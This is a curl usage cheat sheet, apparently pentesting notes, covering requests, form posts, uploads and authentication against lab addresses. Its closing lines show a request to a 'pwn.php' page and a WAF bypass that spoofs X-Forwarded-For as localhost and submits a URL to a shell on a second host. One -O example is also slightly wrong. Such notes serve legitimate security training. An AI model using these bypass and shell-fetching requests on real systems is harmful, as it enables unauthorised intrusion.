# Curl

**CURL** is a tool to transfer data from or to a server, using one of the supported protocols 

```
DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, 
POP3S, RTMP, RTSP, SCP, SFTP, SMB, SMBS, SMTP, SMTPS, TELNET and TFTP
```

#### The command is designed to work without user interaction.

```
curl:
    -v: verbose
    -F: file upload
    -X: make a request  
```

### Examples

```
##### GET example #####
curl http://www.example.com 



##### GET example with hidden info #####
curl -i http://www.example.com 



##### HEAD example #####
 curl --head http://www.example.com
or
 curl -I http://www.example.com



##### Multiple URL's #####
curl http://url1.example.com http://url2.example.com



##### Trace all connections: more than verbose #####
curl --trace-ascii output_filename.txt http://www.example.com 



##### Saves output to a file #####
curl http://www.example.com -O output_filename.txt



##### Passing username:password #####
 curl http://user:password@example.org/
or
 curl -u user:password http://example.org/
```

### Get-form

```
<form method="GET" action="junk.cgi">
 <input type=text name="birthyear">
 <input type=submit name=press value="OK">
 </form>
 
 curl "http://www.hotmail.com/when/junk.cgi?birthyear=1905&press=OK"
```

### Post-form

```
 <form method="POST" action="junk.cgi">
 <input type=text name="birthyear">
 <input type=submit name=press value=" OK ">
 </form>
 
  curl --data "birthyear=1905&press=%20OK%20"  http://www.example.com/when.cgi
```

### File Upload Post

```
<form method="POST" enctype='multipart/form-data' action="upload.cgi">
 <input type=file name=upload>
 <input type=submit name=press value="OK">
</form>

curl --form upload=@localfilename --form press=OK [URL]
```

### Hidden fields

```
<form method="POST" action="foobar.cgi">
 <input type=text name="birthyear">
 <input type=hidden name="person" value="daniel">
 <input type=submit name="press" value="OK">
</form>

 curl --data "birthyear=1905&press=OK&person=daniel" [URL]
```

### Put

```
curl --upload-file uploadfile http://www.example.com/receive.cgi
```

### Location header

```
 ##### Follows redirection #####
 curl --location http://www.example.com
```

### User-Agent

```
curl -A "user-agent-name" -L 10.10.10.10

-A: sets the user-agent
-L: follows the redirection
```

**Authenticate through CLI**

```
curl -u 'username':'password' http://10.10.10.10:8080/path/to/page
curl http://username:password@10.10.10.10:8080/login

curl -X POST http://10.10.10.10:8080/login -d 'user=username&password=password'
curl -X POST http://10.10.10.10:8080/login -d 'username=username&password=password'

JSON Web Token:
curl http://10.10.10.10:8080/login -H 'Authorisation: Bearer token_here'
curl -s http://10.10.10.10:8080/users/1 -H 'Authorisation: Bearer token_here'
curl -s http://10.10.10.10:8080/users/Admin -H 'Authorisation: Bearer token_here'
```

#### Curl Call

```
curl --user username:password 10.10.10.10/pwn.php
```

#### Bypass WAF and pass data

```
curl -X POST http://10.10.10.10/some_content -H "Content-Type: application/json" -H "X-Forwarded-For: localhost" --data ‘{"user":"myusername","url":"http://10.10.10.20/shell"}’ 
```